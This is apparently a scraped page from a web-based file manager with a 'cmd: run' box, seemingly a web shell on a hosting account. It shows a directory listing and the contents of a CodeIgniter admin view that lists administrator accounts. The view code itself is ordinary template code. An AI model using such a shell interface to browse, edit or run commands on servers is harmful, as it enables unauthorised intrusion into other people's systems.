/
home
/
desid573
/
public_html
/
ims2
/
application
/
views
/
admin
/
/home/desid573/public_html/ims2/application/views/admin
mkdir
upload
Name
Size
Mode
Actions
admin.php
11591
0644
edit
dl
rm
adminlist.php
3171
0644
edit
dl
rm
eventlog.php
170
0644
edit
dl
rm
reports.php
1413
0644
edit
dl
rm
Edit:
/home/desid573/public_html/ims2/application/views/admin/adminlist.php
(3171B)
<?php defined('BASEPATH') OR exit(''); ?> <?php echo isset($range) && !empty($range) ? "Showing ".$range : ""?> <div class="panel panel-primary"> <div class="panel-heading">ADMINISTRATOR ACCOUNTS</div> <?php if($allAdministrators):?> <div class="table table-responsive"> <table class="table table-striped table-bordered"> <thead> <tr> <th>SN</th> <th>NAME</th> <th>E-MAIL</th> <th>MOBILE</th> <th>WORK</th> <th>ROLE</th> <th>DATE CREATED</th> <th>LAST LOG IN</th> <th>EDIT</th> <th>ACCOUNT STATUS</th> <th>DELETE</th> </tr> </thead> <tbody> <?php foreach($allAdministrators as $get):?> <tr> <th><?=$sn?>.</th> <td class="adminName"><?=$get->first_name ." ". $get->last_name?></td> <td class="hidden firstName"><?=$get->first_name?></td> <td class="hidden lastName"><?=$get->last_name?></td> <td class="adminEmail"><?=mailto($get->email)?></td> <td class="adminMobile1"><?=$get->mobile1?></td> <td class="adminMobile2"><?=$get->mobile2?></td> <td class="adminRole"><?=ucfirst($get->role)?></td> <td><?=date('jS M, Y h:i:sa', strtotime($get->created_on))?></td> <td> <?=$get->last_login === "0000-00-00 00:00:00" ? "---" : date('jS M, Y h:i:sa', strtotime($get->last_login))?> </td> <td class="text-center editAdmin" id="edit-<?=$get->id?>"> <i class="fa fa-pencil pointer"></i> </td> <td class="text-center suspendAdmin text-success" id="sus-<?=$get->id?>"> <?php if($get->account_status === "1"): ?> <i class="fa fa-toggle-on pointer"></i> <?php else: ?> <i class="fa fa-toggle-off pointer"></i> <?php endif; ?> </td> <td class="text-center text-danger deleteAdmin" id="del-<?=$get->id?>"> <?php if($get->deleted === "1"): ?> <a class="pointer">Undo Delete</a> <?php else: ?> <i class="fa fa-trash pointer"></i> <?php endif; ?> </td> </tr> <?php $sn++;?> <?php endforeach;?> </tbody> </table> </div> <?php else:?> No Administrative Accounts <?php endif; ?> </div> <!-- Pagination --> <div class="row text-center"> <?php echo isset($links) ? $links : ""?> </div> <!-- Pagination ends -->
Save
cmd:
run